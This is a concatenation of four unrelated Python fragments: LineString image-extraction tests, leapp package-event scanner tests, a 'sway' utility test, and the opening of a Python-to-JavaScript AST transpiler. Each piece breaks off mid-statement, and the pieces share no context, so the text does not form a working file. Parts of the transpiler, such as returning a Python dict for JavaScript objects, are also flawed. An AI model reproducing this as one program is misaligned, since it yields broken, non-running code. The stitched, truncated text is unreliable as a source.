img = np.arange(10*10).reshape((10, 10, 1)).astype(np.uint8)
ls = LineString([(1, 1), (9, 9)])
extract_aa = ls.extract_from_image(img, size=3, antialiased=True)
extract = ls.extract_from_image(img, size=3, antialiased=False)
assert extract_aa.shape == extract.shape
assert np.sum(extract_aa) > np.sum(extract)
def test_extract_from_image_pad_false(self):
# pad=False
img = np.arange(10*10).reshape((10, 10, 1)).astype(np.uint8)
ls = LineString([(-5, 5), (-3, 5)])
extract = ls.extract_from_image(img, size=1, antialiased=False,
pad=False, prevent_zero_size=True)
assert extract.shape == (1, 1, 1)
assert np.sum(extract) == 0
def test_extract_from_image_pad_false_and_prevent_zero_size_false(self):
# pad=False, prevent_zero_size=False
img = np.arange(10*10).reshape((10, 10, 1)).astype(np.uint8)
ls = LineString([(-5, 5), (-3, 5)])
extract = ls.extract_from_image(img, size=1, antialiased=False,
pad=False, prevent_zero_size=False)
assert extract.shape == (0, 0, 1)
def test_extract_from_image_pad_max(self):
# pad_max=1
img = np.arange(10*10).reshape((10, 10, 1)).astype(np.uint8)
ls = LineString([(-5, 5), (9, 5)])
extract = ls.extract_from_image(img, antialiased=False, pad=True,
pad_max=1)
assert extract.shape == (1, 11, 1)
assert np.array_equal(extract[:, 1:], img[5:6, 0:10, :])
assert np.all(extract[0, 0, :] == 0)
def test_extract_from_image_with_single_point_line_string(self):
# 1 coord
img = np.arange(10*10).reshape((10, 10, 1)).astype(np.uint8)
ls = LineString([(1, 1)])
extract = ls.extract_from_image(img)
assert extract.shape == (1, 1, 1)
assert np.sum(extract) == img[1:2, 1:2, :]
def test_extract_from_image_with_single_point_ls_negative_coords(self):
img = np.arange(10*10).reshape((10, 10, 1)).astype(np.uint8)
ls = LineString([(-10, -10)])
extract = ls.extract_from_image(img)
assert extract.shape == (1, 1, 1)
assert np.sum(extract) == 0
def test_extract_from_image_with_1_point_neg_coords_prevent_zero_size(self):
img = np.arange(10*10).reshape((10, 10, 1)).astype(np.uint8)
ls = LineString([(-10, -10)])
extract = ls.extract_from_image(img, prevent_zero_size=True)
assert extract.shape == (1, 1, 1)
assert np.sum(extract) == 0
def test_extract_from_image_with_empty_line_string(self):
# 0 coords
img = np.arange(10*10).reshape((10, 10, 1)).astype(np.uint8)
ls = LineString([])
extract = ls.extract_from_image(img)
assert extract.shape == (1, 1, 1)
assert np.sum(extract) == 0
def test_extract_from_image_with_empty_line_string_prevent_zero_size(self):
img = np.arange(10*10).reshape((10, 10, 1)).astype(np.uint8)
ls = LineString([])
extract = ls.extract_from_image(img, prevent_zero_size=False)
assert extract.shape == (0, 0, 1)
assert np.sum(extract) == 0
def test_concatenate_line_string_with_itself(self):
ls = LineString([(0, 0), (1, 0), (2, 1)])
ls_concat = ls.concatenate(ls)
assert ls_concat.coords_almost_equals([
(0, 0), (1, 0), (2, 1), (0, 0), (1, 0), (2, 1)
])
def test_concatenate_empty_line_string_with_itself(self):
ls = LineString([])
ls_concat = ls.concatenate(ls)
assert ls_concat.coords_almost_equals([])
def test_concatenate_empty_line_string_with_single_point_line_string(self):
ls = LineString([])
ls_concat = ls.concatenate(LineString([(0, 0)]))
assert ls_concat.coords_almost_equals([(0, 0)])
def test_concatenate_single_point_line_string_with_empty_line_string(self):
ls = LineString([(0, 0)])
ls_concat = ls.concatenate(LineString([]))
assert ls_concat.coords_almost_equals([(0, 0)])
def test_concatenate_empty_line_string_with_list_of_tuples(self):
ls = LineString([])
ls_concat = ls.concatenate([(0, 0)])
assert ls_concat.coords_almost_equals([(0, 0)])
def test_to_keypoints(self):
ls = LineString([(0, 0), (1, 0), (2, 1)])
observed = ls.to_keypoints()
assert all([isinstance(kp, ia.Keypoint) for kp in observed])
assert np.isclose(observed[0].x, 0)
assert np.isclose(observed[0].y, 0)
assert np.isclose(observed[1].x, 1)
assert np.isclose(observed[1].y, 0)
assert np.isclose(observed[2].x, 2)
assert | |
import functools
import os.path
import pytest
from leapp import reporting
from leapp.exceptions import StopActorExecution, StopActorExecutionError
from leapp.libraries.actor import peseventsscanner
from leapp.libraries.actor.peseventsscanner import (
Action,
Event,
SKIPPED_PKGS_MSG,
Task,
add_output_pkgs_to_transaction_conf,
drop_conflicting_release_events,
filter_events_by_architecture,
filter_events_by_releases,
filter_out_pkgs_in_blacklisted_repos,
filter_releases_by_target,
get_events,
map_repositories, parse_action,
parse_entry, parse_packageset,
parse_pes_events,
process_events,
report_skipped_packages,
)
from leapp.libraries.common import fetch
from leapp.libraries.common.testutils import produce_mocked, create_report_mocked, CurrentActorMocked
from leapp.libraries.stdlib import api
from leapp.models import PESIDRepositoryEntry, RpmTransactionTasks, RepositoriesMapping, RepoMapEntry
CUR_DIR = os.path.dirname(os.path.abspath(__file__))
class show_message_mocked(object):
def __init__(self):
self.called = 0
self.msg = None
def __call__(self, msg):
self.called += 1
self.msg = msg
class get_repos_blacklisted_mocked(object):
def __init__(self, blacklisted):
self.blacklisted = blacklisted
def __call__(self):
return self.blacklisted
def test_parse_action(current_actor_context):
for i in range(8):
assert parse_action(i) == Action(i)
with pytest.raises(ValueError):
parse_action(-1)
parse_action(8)
def test_parse_packageset(current_actor_context):
pkgset = {'package': [{'name': 'pkg1', 'repository': 'Repo'}]}
assert parse_packageset(pkgset) == {'pkg1': 'Repo'}
assert parse_packageset({}) == {}
assert parse_packageset({'setid': 0}) == {}
def test_parse_entry(current_actor_context):
"""
Tests whether the PES event is correctly parsed from the supplied dictionary with the same
structure as are the data stored inside the json.
"""
entry = {
'action': 4,
'in_packageset': {
'package': [{'name': 'original', 'repository': 'repo'}]},
'out_packageset': {
'package': [
{'name': 'split01', 'repository': 'repo'},
{'name': 'split02', 'repository': 'repo'}]}}
event = parse_entry(entry)
assert event.action == Action.SPLIT
assert event.in_pkgs == {'original': 'repo'}
assert event.out_pkgs == {'split01': 'repo', 'split02': 'repo'}
entry = {
'action': 1,
'in_packageset': {
'package': [{'name': 'removed', 'repository': 'repo'}]}}
event = parse_entry(entry)
assert event.action == Action.REMOVED
assert event.in_pkgs == {'removed': 'repo'}
assert event.out_pkgs == {}
def test_parse_pes_events(current_actor_context):
"""
Tests whether all events are correctly parsed from the provided string with the JSON data.
"""
with open(os.path.join(CUR_DIR, 'files/sample01.json')) as f:
events = parse_pes_events(f.read())
assert len(events) == 2
assert events[0].action == Action.SPLIT
assert events[0].in_pkgs == {'original': 'repo'}
assert events[0].out_pkgs == {'split01': 'repo', 'split02': 'repo'}
assert events[1].action == Action.REMOVED
assert events[1].in_pkgs == {'removed': 'repo'}
assert events[1].out_pkgs == {}
@pytest.mark.parametrize('is_verbose_mode_on', [False, True])
def test_report_skipped_packages_no_verbose_mode(monkeypatch, caplog, is_verbose_mode_on):
"""
Tests whether the report_skipped_packages function creates message of the expected form
and that the function respects whether leapp is running in verbose mode.
"""
monkeypatch.setattr(api, 'produce', produce_mocked())
monkeypatch.setattr(api, 'show_message', show_message_mocked())
monkeypatch.setattr(reporting, 'create_report', create_report_mocked())
leapp_verbose = '1' if is_verbose_mode_on else '0'
monkeypatch.setenv('LEAPP_VERBOSE', leapp_verbose)
report_skipped_packages(
title='Packages will not be installed',
message='packages will not be installed:',
package_repo_pairs=[('skipped01', 'bad_repo01'), ('skipped02', 'bad_repo02')]
)
# FIXME(pstodulk): this is obviously wrong. repoid is currently pesid.. so test
# is incorrect, and code is incorrect. even the message is missleading.
# this is going to be fixed in close future.
message = (
'2 packages will not be installed:\n'
'- skipped01 (repoid: bad_repo01)\n'
'- skipped02 (repoid: bad_repo02)'
)
# Verbose level should only control whether show_message is called, report entry should be created
# in both cases.
if is_verbose_mode_on:
assert message in caplog.messages
else:
assert api.show_message.called == 0
assert reporting.create_report.called == 1
assert reporting.create_report.report_fields['title'] == 'Packages will not be installed'
assert reporting.create_report.report_fields['summary'] == message
def test_filter_out_pkgs_in_blacklisted_repos(monkeypatch, caplog):
"""
Verifies that packages from blacklisted repos are filtered out.
Verifies that the dictionary mapping packages to the target repoids gets correctly cleansed of all entries
containing a blacklisted target repository when using filter_out_pkgs_in_blacklisted_repos. Also verifies
that the user gets informed about packages not being installed due to a blacklisted repository.
"""
monkeypatch.setattr(api, 'show_message', show_message_mocked())
monkeypatch.setattr(reporting, 'create_report', create_report_mocked())
monkeypatch.setattr(peseventsscanner, 'get_repositories_blacklisted',
get_repos_blacklisted_mocked(set(['blacklisted'])))
monkeypatch.setenv('LEAPP_VERBOSE', '1')
to_install = {
'pkg01': 'repo01',
'pkg02': 'repo02',
'skipped01': 'blacklisted',
'skipped02': 'blacklisted',
}
msg = '2 {}\n{}'.format(
SKIPPED_PKGS_MSG,
'\n'.join(
[
'- {pkg} (repoid: {repo})'.format(pkg=pkg, repo=repo)
for pkg, repo in filter( # pylint: disable=deprecated-lambda
lambda item: item[1] == 'blacklisted', to_install.items()
)
]
)
)
filter_out_pkgs_in_blacklisted_repos(to_install)
assert msg in caplog.messages
assert reporting.create_report.called == 1
assert reporting.create_report.report_fields['summary'] == msg
assert reporting.create_report.report_fields['title'] == (
'Packages available in excluded repositories will not be installed'
)
assert to_install == {'pkg01': 'repo01', 'pkg02': 'repo02'}
def test_resolve_conflicting_requests(monkeypatch):
"""
Verifies that the algorithm correctly resolves conflicting pes events.
"""
monkeypatch.setattr(peseventsscanner, 'map_repositories', lambda x: x)
monkeypatch.setattr(peseventsscanner, 'filter_out_pkgs_in_blacklisted_repos', lambda x: x)
events = [
Event(1, Action.SPLIT, {'sip-devel': 'repo'}, {'python3-sip-devel': 'repo', 'sip': 'repo'},
(7, 6), (8, 0), []),
Event(2, Action.SPLIT, {'sip': 'repo'}, {'python3-pyqt5-sip': 'repo', 'python3-sip': 'repo'},
(7, 6), (8, 0), [])]
installed_pkgs = {'sip', 'sip-devel'}
tasks = process_events([(8, 0)], events, installed_pkgs)
assert tasks[Task.INSTALL] == {'python3-sip-devel': 'repo', 'python3-pyqt5-sip': 'repo', 'python3-sip': 'repo'}
assert tasks[Task.REMOVE] == {'sip-devel': 'repo'}
assert tasks[Task.KEEP] == {'sip': 'repo'}
@pytest.mark.parametrize(('source_repoid', 'expected_target_repoid'),
[('rhel7-base-repoid', 'rhel8-crb-repoid'),
('rhel7-base-repoid-eus', 'rhel8-crb-repoid-eus')])
def test_request_pesid_repo_not_mapped_by_default(monkeypatch, source_repoid, expected_target_repoid):
"""
Tests whether a target repository that is not mapped by default (e.g. CRB)
is requested to be enabled on the target system if it results from the relevant events.
Note: Since the resulting target repository is not mapped by default from the enabled repositories,
the data handler should fail to get expected repoids for the given pesid as it works with enabled
repositories. Therefor, this test tests whether the fallback lookup with representative repository works.
"""
repositories_mapping = RepositoriesMapping(
mapping=[
RepoMapEntry(source='rhel7-base', target=['rhel8-BaseOS', 'rhel8-AppStream']),
RepoMapEntry(source='rhel7-optional', target=['rhel8-CRB']),
],
repositories=[
PESIDRepositoryEntry(pesid='rhel7-base', major_version='7', repoid='rhel7-base-repoid',
arch='x86_64', repo_type='rpm', channel='ga', rhui=''),
PESIDRepositoryEntry(pesid='rhel7-base', major_version='7', repoid='rhel7-base-repoid-eus',
arch='x86_64', repo_type='rpm', channel='eus', rhui=''),
PESIDRepositoryEntry(pesid='rhel7-optional', major_version='7', repoid='rhel7-optional-repoid',
arch='x86_64', repo_type='rpm', channel='ga', rhui=''),
PESIDRepositoryEntry(pesid='rhel8-BaseOS', major_version='8', repoid='rhel8-baseos-repoid',
arch='x86_64', repo_type='rpm', channel='ga', rhui=''),
PESIDRepositoryEntry(pesid='rhel8-BaseOS', major_version='8', repoid='rhel8-baseos-repoid-eus',
arch='x86_64', repo_type='rpm', channel='eus', rhui=''),
PESIDRepositoryEntry(pesid='rhel8-AppStream', major_version='8', repoid='rhel8-appstream-repoid',
arch='x86_64', repo_type='rpm', channel='ga', rhui=''),
PESIDRepositoryEntry(pesid='rhel8-CRB', major_version='8', repoid='rhel8-crb-repoid',
arch='x86_64', repo_type='rpm', channel='ga', rhui=''),
PESIDRepositoryEntry(pesid='rhel8-CRB', major_version='8', repoid='rhel8-crb-repoid-eus',
arch='x86_64', repo_type='rpm', channel='eus', rhui=''),
])
monkeypatch.setattr(peseventsscanner, '_get_enabled_repoids', lambda: {source_repoid})
monkeypatch.setattr(api,
'current_actor',
CurrentActorMocked(msgs=[repositories_mapping], src_ver='7.9', dst_ver='8.4'))
event = Event(1, Action.MOVED, {'test-pkg': 'rhel7-base'}, {'test-pkg': 'rhel8-CRB'},
(7, 9), (8, 0), [])
installed_pkgs = {'test-pkg'}
tasks = process_events([(8, 0)], [event], installed_pkgs)
assert tasks[Task.KEEP] == {'test-pkg': expected_target_repoid}
def test_get_repositories_mapping(monkeypatch):
"""
Tests whether the actor is able to correctly determine the dictionary that maps the target PES ids
determined from the event processing to the actual target repository ids.
(tests for the _get_repositories_mapping).
"""
make_pesid_repo = functools.partial(PESIDRepositoryEntry, arch='x86_64', repo_type='rpm', channel='ga', rhui='')
repositories_mapping = RepositoriesMapping(
mapping=[
RepoMapEntry(source='rhel7-base', target=['rhel8-BaseOS', 'rhel8-AppStream']),
RepoMapEntry(source='rhel7-optional', target=['rhel8-CRB']),
],
repositories=[
make_pesid_repo(pesid='rhel7-base', major_version='7', repoid='rhel7-base-repoid'),
make_pesid_repo(pesid='rhel7-optional', major_version='7', repoid='rhel7-optional-repoid'),
make_pesid_repo(pesid='rhel8-BaseOS', major_version='8', repoid='rhel8-baseos-repoid'),
make_pesid_repo(pesid='rhel8-AppStream', major_version='8', repoid='rhel8-appstream-repoid'),
make_pesid_repo(pesid='rhel8-CRB', major_version='8', repoid='rhel8-crb-repoid'),
# Extra repositories to make sure the created map contains the correct repoids
PESIDRepositoryEntry(pesid='rhel8-CRB', major_version='8', repoid='rhel8-crb-repoid-azure',
arch='x86_64', repo_type='rpm', channel='ga', rhui='azure'),
PESIDRepositoryEntry(pesid='rhel8-BaseOS', major_version='8', repoid='rhel8-baseos-repoid-eus',
arch='x86_64', repo_type='rpm', channel='eus', rhui=''),
PESIDRepositoryEntry(pesid='rhel8-BaseOS', major_version='8', repoid='rhel8-baseos-repoid-s390x',
arch='s390x', repo_type='rpm', channel='ga', rhui=''),
])
monkeypatch.setattr(peseventsscanner, '_get_enabled_repoids', lambda: {'rhel7-base-repoid'})
monkeypatch.setattr(api,
'current_actor',
CurrentActorMocked(msgs=[repositories_mapping], src_ver='7.9', dst_ver='8.4'))
target_pesids = {'rhel8-BaseOS', 'rhel8-AppStream', 'rhel8-CRB'}
expected_pesid_to_target_repoids = {
'rhel8-BaseOS': 'rhel8-baseos-repoid',
'rhel8-AppStream': 'rhel8-appstream-repoid',
'rhel8-CRB': 'rhel8-crb-repoid'
}
actual_pesid_to_target_repoids = peseventsscanner._get_repositories_mapping(target_pesids)
fail_description = 'Actor failed to determine what repoid to enable for given target pesids.'
assert actual_pesid_to_target_repoids == expected_pesid_to_target_repoids, fail_description
def test_pesid_to_target_repoids_translation(monkeypatch, caplog):
"""
Tests whether the actor is able to correctly translate target pesids resulting
from event processing when it is supplied with a valid dictionary that maps pesids to target repoids.
"""
monkeypatch.setattr(api, 'show_message', show_message_mocked())
monkeypatch.setattr(peseventsscanner, '_get_repositories_mapping', lambda dummy_target_pesids: {'repo': 'mapped'})
monkeypatch.setattr(reporting, 'create_report', create_report_mocked())
monkeypatch.setenv('LEAPP_VERBOSE', '1')
to_install = {
'pkg01': 'repo',
'pkg02': 'repo',
'skipped01': 'not_mapped',
'skipped02': 'not_mapped'}
map_repositories(to_install)
msg = (
'2 packages may not be installed or upgraded due to repositories unknown to leapp:\n'
'- skipped01 (repoid: not_mapped)\n'
'- skipped02 (repoid: not_mapped)'
)
assert msg in caplog.messages
assert reporting.create_report.called == 1
assert reporting.create_report.report_fields['title'] == (
'Packages from unknown repositories may not be installed'
)
assert reporting.create_report.report_fields['summary'] == msg
assert to_install == {'pkg01': 'mapped', 'pkg02': 'mapped'}
def test_process_events(monkeypatch):
"""
Verifies that the event processing algorithm works as expected.
"""
monkeypatch.setattr(peseventsscanner,
'_get_repositories_mapping',
lambda dummy_target_pesids: {'rhel8-repo': 'rhel8-mapped'})
monkeypatch.setattr(peseventsscanner, 'get_repositories_blacklisted', get_repos_blacklisted_mocked(set()))
events = [
Event(1, Action.SPLIT, {'original': 'rhel7-repo'}, {'split01': 'rhel8-repo', 'split02': 'rhel8-repo'},
(7, 6), (8, 0), []),
Event(2, Action.REMOVED, {'removed': 'rhel7-repo'}, {}, (7, 6), (8, 0), []),
Event(3, Action.PRESENT, {'present': 'rhel8-repo'}, {}, (7, 6), (8, 0), []),
# this package is present at the start, gets removed and then reintroduced
Event(4, Action.REMOVED, {'reintroduced': 'rhel7-repo'}, {}, (7, 6), (8, 0), []),
Event(5, Action.PRESENT, {'reintroduced': 'rhel8-repo'}, {}, (8, 0), (8, 1), []),
# however, this package was never there
Event(6, Action.REMOVED, {'neverthere': 'rhel7-repo'}, {}, (7, 6), (8, 0), []),
Event(7, Action.PRESENT, {'neverthere': 'rhel8-repo'}, {}, (8, 0), (8, 1), [])]
installed_pkgs = {'original', 'removed', 'present', 'reintroduced'}
tasks = process_events([(8, 0), (8, 1)], events, installed_pkgs)
assert tasks[Task.INSTALL] == {'split02': 'rhel8-mapped', 'split01': 'rhel8-mapped'}
assert tasks[Task.REMOVE] == {'removed': 'rhel7-repo', 'original': 'rhel7-repo'}
assert tasks[Task.KEEP] == {'present': 'rhel8-mapped', 'reintroduced': 'rhel8-mapped'}
def test_get_events(monkeypatch):
"""
Verifies that the actor gracefully handles errors raised when unable to load events | |
import os
import sys
cur_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(cur_dir)
import unittest
from src.whun.utils.utils import sway, split_bin
from src.whun.whun_helper.item import Item
class TestUtils(unittest.TestCase):
def test_sway(self):
item1 = Item(
[0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1, 1, 0,
0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1,
1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 1, 1, 0, 1, 0, 0,
1, 0, 1, 1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1], [0, 1, 0, 0, 0, 0])
item2 = Item(
[0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1, 1, 0,
0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1,
1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 1, 1, 0, 1, 0, 0,
1, 0, 1, 1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1], [0, 1, 0, 0, 0, 0])
item3 = Item(
[0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1, 1, 0,
0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1,
1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 1, 1, 0, 1, 0, 0,
1, 0, 1, 1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1], [0, 1, 0, 0, 0, 0])
item4 = Item(
[0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1, 1, 0,
0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1,
1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 1, 1, 0, 1, 0, 0,
1, 0, 1, 1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1], [0, 1, 0, 0, 0, 0])
item5 = Item(
[0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1, 1, 0,
0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1,
1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 1, 1, 0, 1, 0, 0,
1, 0, 1, 1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1], [0, 1, 0, 0, 0, 0])
item6 = Item(
[0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1, 1, 0,
0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1,
1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 1, 1, 0, 1, 0, 0,
1, 0, 1, 1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1], [0, 1, 0, 0, 0, 0])
item7 = Item(
[0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1, 1, 0,
0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1,
1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 1, 1, 0, 1, 0, 0,
1, 0, 1, 1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1], [0, 1, 0, 0, 0, 0])
item8 = Item(
[0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1, 1, 0,
0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1,
1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 1, 1, 0, 1, 0, 0,
1, 0, 1, 1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1], [0, 1, 0, 0, 0, 0])
item9 = Item(
[0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1, 1, 0,
0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1,
1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 1, 1, 0, 1, 0, 0,
1, 0, 1, 1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1], [0, 1, 0, 0, 0, 0])
item10 = Item(
[0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1, 1, 0,
0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, | |
import ast
import decimal
from collections.abc import Iterable
#TODO
"""
- implement imports: make python modules using es3 js module pattern
- implement builtins/exc: make map of builtins and exceptions to js
"""
GLOBALS = set()
def SubscriptPrint(node, nodemap):
value, slice_ = generate_code(node.value), generate_code(node.slice)
return f"{value}{slice_}"
def ExtSlicePrint(node, nodemap):
raise SyntaxError("Complex slicing is not supported by JavaScript")
def SlicePrint(node, nodemap):
if node.step: raise SyntaxError("Slicing by step is not supported by JavaScript")
l = generate_code(node.lower) if node.lower else 0
u = generate_code(node.upper) if node.upper else None
if not u:
return f".slice({l})"
else:
return f".slice({l},{u})"
def IndexPrint(node, nodemap):
value = generate_code(node.value)
return f"[{value}]"
def AttributePrint(node, nodemap):
# TODO replace append with push, remove with pop, etc.
value = generate_code(node.value)
return f"{value}.{node.attr}"
def IfExpPrint(node, nodemap):
ifexpr = generate_code(node.test)
body, orelse = generate_code(node.body), generate_code(node.orelse)
return f"{ifexpr} ? {body}:{orelse};"
def StarredPrint(node, nodemap):
raise SyntaxError("JavaScript does not support packing or unpacking")
def DeletePrint(node, nodemap):
targets = ",".join([str(generate_code(t)) for t in node.targets])
return f"delete {targets};"
def CallPrint(node, nodemap):
func = generate_code(node.func)
callstr = f"{func}("
for i in range(len(node.args)):
arg = generate_code(node.args[i])
if i == len(node.args) - 1:
callstr = f"{callstr}{arg}"
else:
callstr = f"{callstr}{arg},"
callstr = f"{callstr});"
return callstr
def keywordPrint(node, nodemap):
value = generate_code(node.value)
return f"'{node.arg}':{value}"
def NotInPrint(node, nodemap):
return None
def InPrint(node, nodemap):
return "in"
def IsNotPrint(node, nodemap):
return "!=="
def IsPrint(node, nodemap):
return "==="
def GtEPrint(node, nodemap):
return ">="
def GtPrint(node, nodemap):
return ">"
def LtEPrint(node, nodemap):
return "<="
def LtPrint(node, nodemap):
return "<"
def NotEqPrint(node, nodemap):
return "!="
def EqPrint(node, nodemap):
return "=="
def ComparePrint(node, nodemap):
left = generate_code(node.left)
cmpstr = str(left)
for i in range(len(node.comparators)):
op, comp = generate_code(node.ops[i]), generate_code(node.comparators[i])
if isinstance(node.ops[i], ast.In):
cmpstr = f"{cmpstr} {op} {comp}"
elif isinstance(node.ops[i], ast.NotIn):
# get left comparator, slice left comparator out of str,
# build str with previous compares and negated in compare
leftcomp = cmpstr[cmpstr.rfind(" ") + 1:]
cmpstr = cmpstr[:cmpstr.rfind(" ") + 1]
cmpstr = f"{cmpstr} !({leftcomp} in {comp})"
else:
cmpstr = f"{cmpstr} {op} {comp}"
return cmpstr
def AddPrint(node, nodemap):
return "+"
def SubPrint(node, nodemap):
return "-"
def MultPrint(node, nodemap):
return "*"
def DivPrint(node, nodemap):
return "/"
def FloorDivPrint(node, nodemap):
return "/"
def ModPrint(node, nodemap):
return "%"
def PowPrint(node, nodemap):
return None
def LShiftPrint(node, nodemap):
return "<<"
def RShiftPrint(node, nodemap):
return ">>"
def BitOrPrint(node, nodemap):
return "|"
def BitXorPrint(node, nodemap):
return "^"
def BitAndPrint(node, nodemap):
return "&"
def MatMultPrint(node, nodemap):
raise SyntaxError("Compiler does not support Matrix Multiplication Binary Operator '@'")
def BinOpPrint(node, nodemap):
left, op, right = generate_code(node.left), generate_code(node.op), generate_code(node.right)
if isinstance(node.op, ast.Pow):
return f"Math.pow({left}, {right})"
elif isinstance(node.op, ast.FloorDiv):
return f"Math.floor(({left}{op}{right}))"
else:
return f"{left}{op}{right}"
def NotPrint(node, nodemap):
return "!"
def UnaryOpPrint(node, nodemap):
return f"{generate_code(node.op)}{generate_code(node.operand)}"
def BoolOpPrint(node, nodemap):
left, right = [generate_code(node) for node in node.values]
bool_ = generate_code(node.op)
return f"{left} {bool_} {right}"
def OrPrint(node, nodemap):
return "||"
def AndPrint(node, nodemap):
return "&&"
def DictPrint(node, nodemap):
keys = [generate_code(el) for el in node.keys]
values = [generate_code(el) for el in node.values]
return dict(zip(keys, values))
def SetPrint(node, nodemap):
elts = ",".join(set(generate_code(el) for el in node.elts))
return f"[{elts}]"
def ListPrint(node, nodemap):
elts = ",".join([str(generate_code(el)) for el in node.elts])
return f"[{elts}]"
def TuplePrint(node, nodemap):
elts = ",".join([str(generate_code(el)) for el in node.elts])
return f"[{elts}]"
def NamePrint(node, nodemap):
context = ("self", "this")
return node.id if node.id.find(context[0]) < 0 else context[1]
def FormattedValuePrint(node, nodemap):
return generate_code(node.value)
def ConstantPrint(node, nodemap):
